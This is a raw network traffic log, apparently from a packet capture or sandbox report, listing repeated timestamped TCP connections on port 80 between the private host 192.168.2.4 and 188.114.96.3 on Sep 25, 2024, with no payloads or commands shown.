                  Sep 25, 2024 15:28:55.230811119 CEST5589580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.235086918 CEST8055895188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:55.368535042 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.506407976 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:55.506495953 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.508654118 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.513530016 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:55.513578892 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:55.518429995 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.263027906 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.263320923 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.263516903 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.263571978 CEST5589680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.268224955 CEST8055896188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.400232077 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.405261993 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.405390978 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.407444000 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.412307024 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:56.412404060 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:56.417293072 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.191807985 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.191920042 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.192152977 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.192229986 CEST5589780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.196980953 CEST8055897188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.336867094 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.591490030 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.591645002 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.593775988 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.598650932 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:57.598722935 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:57.603569031 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.321290016 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.321399927 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.322237015 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.322285891 CEST5589880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.326272964 CEST8055898188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.462858915 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.467717886 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.467799902 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.469784975 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.474620104 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:58.474678040 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:58.479572058 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.169311047 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.169487953 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.170552015 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.170604944 CEST5589980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.176151037 CEST8055899188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.318993092 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.475148916 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.475307941 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.477629900 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.484102011 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:28:59.484195948 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:28:59.489350080 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.300595045 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.300721884 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.301104069 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.301153898 CEST5590080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.305746078 CEST8055900188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.461532116 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.466552973 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.466634989 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.468620062 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.473480940 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:00.473536015 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:00.478383064 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.202205896 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.202416897 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.202426910 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.202487946 CEST5590180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.207279921 CEST8055901188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.359373093 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.364424944 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.364502907 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.367449045 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.372373104 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:01.372432947 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:01.377341032 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.085413933 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.085525036 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.086122036 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.086163044 CEST5590280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.090432882 CEST8055902188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.227688074 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.232837915 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.232942104 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.234904051 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.239820957 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:02.239881039 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:02.244776011 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.023292065 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.023324966 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.023456097 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.023627996 CEST5590380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.028345108 CEST8055903188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.234275103 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.239249945 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.239325047 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.271222115 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.276190042 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.276279926 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.281040907 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.936767101 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.936889887 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.938283920 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:03.938391924 CEST5590480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:03.941766024 CEST8055904188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.086853027 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.092379093 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.092514038 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.094444990 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.099798918 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.099860907 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.107049942 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.757303953 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.757534027 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.758312941 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.758373976 CEST5590580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.762455940 CEST8055905188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.901523113 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.906533957 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.906687975 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.908715010 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.914587021 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:04.914671898 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:04.919504881 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.574727058 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.574850082 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.575196028 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.575257063 CEST5590680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.579761982 CEST8055906188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.710910082 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.715948105 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.716069937 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.718041897 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.723005056 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:05.723093033 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:05.728027105 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.426374912 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.426526070 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.427726984 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.427792072 CEST5590780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.431327105 CEST8055907188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.575077057 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.580080032 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.580159903 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.582248926 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.587903023 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:06.587970972 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:06.593162060 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.270327091 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.270519972 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.271265984 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.271318913 CEST5590880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.275362015 CEST8055908188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.436861038 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.442087889 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.442178965 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.444246054 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.449915886 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:07.449996948 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:07.455071926 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.155661106 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.155724049 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.155785084 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.156112909 CEST5590980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.160820007 CEST8055909188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.307549000 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.312556028 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.312642097 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.314676046 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.319519043 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:08.319577932 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:08.324451923 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.003256083 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.003544092 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.004868984 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.004928112 CEST5591080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.008486032 CEST8055910188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.165110111 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.172074080 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.172163963 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.174232006 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.180985928 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.181025982 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.186547995 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.872705936 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.872961044 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.873544931 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:09.873595953 CEST5591180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:09.877821922 CEST8055911188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.027779102 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.032752991 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.032818079 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.034786940 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.039563894 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.039622068 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.044404030 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.728037119 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.728142023 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.728497982 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.728549004 CEST5591280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.733141899 CEST8055912188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.879240036 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.884290934 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.884505033 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.887372971 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.892343998 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:10.892410040 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:10.897280931 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.581698895 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.581835985 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.582000017 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.582057953 CEST5591380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.588289976 CEST8055913188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.738733053 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.745556116 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.745649099 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.748871088 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.755378962 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:11.755446911 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:11.760690928 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.445864916 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.445970058 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.446190119 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.446244001 CEST5591480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.450993061 CEST8055914188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.595010042 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.600791931 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.600989103 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.603019953 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.607968092 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:12.608011007 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:12.613403082 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.328320026 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.328556061 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.328747988 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.328804970 CEST5591580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.333492041 CEST8055915188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.474045992 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.479160070 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.479233980 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.482163906 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.486959934 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:13.487014055 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:13.491878033 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.283534050 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.284487963 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.284533024 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.284533024 CEST5591680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.289431095 CEST8055916188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.445102930 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.450103998 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.450185061 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.452272892 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.457300901 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:14.457361937 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:14.462142944 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.163403988 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.163542986 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.163990974 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.164052963 CEST5591780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.172020912 CEST8055917188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.331796885 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.337119102 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.337220907 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.339183092 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.345597029 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:15.345683098 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:15.351655960 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.082158089 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.082397938 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.082948923 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.083049059 CEST5591880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.087444067 CEST8055918188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.239569902 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.349798918 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.349877119 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.352869034 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.357738972 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:16.357806921 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:16.362776041 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.069355011 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.069654942 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.069735050 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.069791079 CEST5591980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.074546099 CEST8055919188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.217329979 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.222316027 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.222383976 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.224992037 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.230257988 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.230321884 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.235146999 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.926692009 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.927203894 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.927969933 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:17.928041935 CEST5592080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:17.932138920 CEST8055920188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.096944094 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.102425098 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.102580070 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.106753111 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.111581087 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.111648083 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.116441011 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.781105042 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.781203985 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.783730030 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.783782005 CEST5592180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.786815882 CEST8055921188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.935683012 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.940635920 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.940733910 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.943695068 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.948530912 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:18.948582888 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:18.953350067 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.609523058 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.609687090 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.610387087 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.610439062 CEST5592280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.614844084 CEST8055922188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.772528887 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.777781010 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.777894974 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.780791998 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.785748959 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:19.785847902 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:19.790704966 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.495378971 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.495549917 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.497245073 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.497313023 CEST5592380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.501106977 CEST8055923188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.643821955 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.649606943 CEST8055924188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.649749994 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.652770996 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.657798052 CEST8055924188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:20.658124924 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:20.663149118 CEST8055924188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:21.686429024 CEST8055924188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:21.686655045 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.687200069 CEST8055924188.114.96.3192.168.2.4
